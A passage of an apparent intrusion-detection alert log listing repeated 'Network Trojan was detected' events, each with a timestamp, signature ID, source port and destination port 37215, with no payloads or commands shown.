                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489420
                  SID:2835222
                  Source Port:43368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906715
                  SID:2835222
                  Source Port:35674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846619
                  SID:2829579
                  Source Port:33534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607346
                  SID:2835222
                  Source Port:37856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555940
                  SID:2835222
                  Source Port:48968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673893
                  SID:2829579
                  Source Port:36546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.546173
                  SID:2835222
                  Source Port:34716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926521
                  SID:2829579
                  Source Port:36804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795415
                  SID:2829579
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803934
                  SID:2829579
                  Source Port:60544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793323
                  SID:2835222
                  Source Port:59192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906950
                  SID:2835222
                  Source Port:48486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.931137
                  SID:2835222
                  Source Port:55512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695244
                  SID:2829579
                  Source Port:35136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629173
                  SID:2829579
                  Source Port:55416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886609
                  SID:2835222
                  Source Port:42646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775881
                  SID:2835222
                  Source Port:34676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583390
                  SID:2835222
                  Source Port:35708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887871
                  SID:2835222
                  Source Port:43800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742334
                  SID:2829579
                  Source Port:48858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585323
                  SID:2835222
                  Source Port:43156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781093
                  SID:2835222
                  Source Port:52504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786358
                  SID:2835222
                  Source Port:51724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847290
                  SID:2829579
                  Source Port:38694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550669
                  SID:2835222
                  Source Port:43696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577108
                  SID:2829579
                  Source Port:44082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585624
                  SID:2829579
                  Source Port:40098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487976
                  SID:2829579
                  Source Port:41768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868575
                  SID:2829579
                  Source Port:40348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661985
                  SID:2835222
                  Source Port:37756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799204
                  SID:2829579
                  Source Port:60296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487952
                  SID:2829579
                  Source Port:48590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546744
                  SID:2829579
                  Source Port:54308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629645
                  SID:2835222
                  Source Port:42640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920880
                  SID:2829579
                  Source Port:42194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.802063
                  SID:2835222
                  Source Port:36356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278845
                  SID:2835222
                  Source Port:41734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536551
                  SID:2829579
                  Source Port:37958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278076
                  SID:2835222
                  Source Port:42646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742597
                  SID:2829579
                  Source Port:43514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527428
                  SID:2829579
                  Source Port:46004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537716
                  SID:2829579
                  Source Port:42386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864845
                  SID:2835222
                  Source Port:44134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785653
                  SID:2829579
                  Source Port:39574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696382
                  SID:2835222
                  Source Port:48548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887868
                  SID:2835222
                  Source Port:39556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579009
                  SID:2829579
                  Source Port:55710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586445
                  SID:2829579
                  Source Port:32830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789809
                  SID:2829579
                  Source Port:59060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788958
                  SID:2835222
                  Source Port:37100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293148
                  SID:2829579
                  Source Port:54580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793509
                  SID:2835222
                  Source Port:33468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.791037
                  SID:2829579
                  Source Port:32980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298070
                  SID:2829579
                  Source Port:36634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.869836
                  SID:2835222
                  Source Port:52650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528862
                  SID:2829579
                  Source Port:58078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788291
                  SID:2829579
                  Source Port:52022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846738
                  SID:2829579
                  Source Port:47928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888359
                  SID:2835222
                  Source Port:56976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837156
                  SID:2835222
                  Source Port:57282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488719
                  SID:2835222
                  Source Port:54510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488513
                  SID:2829579
                  Source Port:48972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768545
                  SID:2829579
                  Source Port:34728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577751
                  SID:2835222
                  Source Port:43796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628948
                  SID:2835222
                  Source Port:49600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750009
                  SID:2829579
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315517
                  SID:2835222
                  Source Port:51118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536548
                  SID:2829579
                  Source Port:35428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738066
                  SID:2835222
                  Source Port:50282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.802768
                  SID:2829579
                  Source Port:47792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659733
                  SID:2835222
                  Source Port:54280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293121
                  SID:2835222
                  Source Port:55678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696293
                  SID:2829579
                  Source Port:51164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545862
                  SID:2829579
                  Source Port:50028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530606
                  SID:2829579
                  Source Port:37826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528967
                  SID:2829579
                  Source Port:57778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795806
                  SID:2829579
                  Source Port:35048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788937
                  SID:2835222
                  Source Port:60836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.929062
                  SID:2835222
                  Source Port:42694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.890815
                  SID:2829579
                  Source Port:52396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312579
                  SID:2835222
                  Source Port:50072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528104
                  SID:2835222
                  Source Port:47720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702575
                  SID:2829579
                  Source Port:45402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872235
                  SID:2829579
                  Source Port:48852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906711
                  SID:2835222
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651356
                  SID:2835222
                  Source Port:41896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737744
                  SID:2835222
                  Source Port:49302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488721
                  SID:2835222
                  Source Port:55242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530563
                  SID:2829579
                  Source Port:60998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.704281
                  SID:2829579
                  Source Port:46512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845975
                  SID:2835222
                  Source Port:40818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737853
                  SID:2835222
                  Source Port:34336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795037
                  SID:2835222
                  Source Port:51168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930336
                  SID:2835222
                  Source Port:60544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530960
                  SID:2835222
                  Source Port:39728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316548
                  SID:2829579
                  Source Port:43572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542763
                  SID:2829579
                  Source Port:46196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887856
                  SID:2835222
                  Source Port:39546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586417
                  SID:2829579
                  Source Port:46702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910614
                  SID:2829579
                  Source Port:43280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489739
                  SID:2835222
                  Source Port:39036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910934
                  SID:2835222
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537015
                  SID:2829579
                  Source Port:45926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846420
                  SID:2835222
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316008
                  SID:2835222
                  Source Port:38804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.911514
                  SID:2829579
                  Source Port:59138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660623
                  SID:2829579
                  Source Port:52480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696301
                  SID:2829579
                  Source Port:47738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283826
                  SID:2835222
                  Source Port:56242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817825
                  SID:2835222
                  Source Port:55394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915733
                  SID:2829579
                  Source Port:57470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930518
                  SID:2835222
                  Source Port:49134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.387564
                  SID:2829579
                  Source Port:52896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495014
                  SID:2835222
                  Source Port:58788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583511
                  SID:2829579
                  Source Port:55886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545121
                  SID:2829579
                  Source Port:58082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.792811
                  SID:2835222
                  Source Port:35294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316234
                  SID:2835222
                  Source Port:47678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546804
                  SID:2829579
                  Source Port:49550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781233
                  SID:2835222
                  Source Port:38990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.611069
                  SID:2829579
                  Source Port:58330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694989
                  SID:2829579
                  Source Port:43962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790731
                  SID:2829579
                  Source Port:42350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585032
                  SID:2835222
                  Source Port:45070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888387
                  SID:2829579
                  Source Port:35784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788206
                  SID:2829579
                  Source Port:56458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912835
                  SID:2829579
                  Source Port:51206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907387
                  SID:2829579
                  Source Port:47952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292524
                  SID:2835222
                  Source Port:49834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555516
                  SID:2835222
                  Source Port:46920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922675
                  SID:2829579
                  Source Port:56288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627926
                  SID:2829579
                  Source Port:35738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277650
                  SID:2835222
                  Source Port:54734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720251
                  SID:2835222
                  Source Port:57274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657734
                  SID:2829579
                  Source Port:51720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628774
                  SID:2835222
                  Source Port:60886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719258
                  SID:2835222
                  Source Port:42512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.876907
                  SID:2829579
                  Source Port:39028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316356
                  SID:2835222
                  Source Port:56080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584337
                  SID:2835222
                  Source Port:46314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660420
                  SID:2829579
                  Source Port:52036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.919285
                  SID:2829579
                  Source Port:37244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315748
                  SID:2829579
                  Source Port:33818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900432
                  SID:2835222
                  Source Port:60390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316235
                  SID:2835222
                  Source Port:59210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528315
                  SID:2829579
                  Source Port:48424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529694
                  SID:2835222
                  Source Port:38132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703084
                  SID:2829579
                  Source Port:51658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296179
                  SID:2835222
                  Source Port:44960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923926
                  SID:2835222
                  Source Port:60822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.324230
                  SID:2835222
                  Source Port:60692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789489
                  SID:2835222
                  Source Port:52004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922720
                  SID:2835222
                  Source Port:48974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607346
                  SID:2829579
                  Source Port:37856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489898
                  SID:2829579
                  Source Port:49760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298960
                  SID:2829579
                  Source Port:56338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.589150
                  SID:2829579
                  Source Port:53938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544251
                  SID:2835222
                  Source Port:55686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530596
                  SID:2829579
                  Source Port:36174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.290847
                  SID:2835222
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628302
                  SID:2829579
                  Source Port:46724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491414
                  SID:2835222
                  Source Port:56500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780558
                  SID:2829579
                  Source Port:48110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316606
                  SID:2835222
                  Source Port:57466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547320
                  SID:2835222
                  Source Port:39752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790745
                  SID:2835222
                  Source Port:37458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536240
                  SID:2829579
                  Source Port:41966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548624
                  SID:2835222
                  Source Port:43878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300909
                  SID:2829579
                  Source Port:45958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696376
                  SID:2835222
                  Source Port:58214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888306
                  SID:2829579
                  Source Port:41928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536009
                  SID:2835222
                  Source Port:49610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661328
                  SID:2835222
                  Source Port:60734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316311
                  SID:2835222
                  Source Port:56352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785710
                  SID:2835222
                  Source Port:39150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542566
                  SID:2829579
                  Source Port:36050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591416
                  SID:2835222
                  Source Port:48934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.801942
                  SID:2829579
                  Source Port:58932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607190
                  SID:2835222
                  Source Port:49652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.887017
                  SID:2829579
                  Source Port:45260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906985
                  SID:2829579
                  Source Port:59372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787961
                  SID:2835222
                  Source Port:41960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627813
                  SID:2835222
                  Source Port:47552
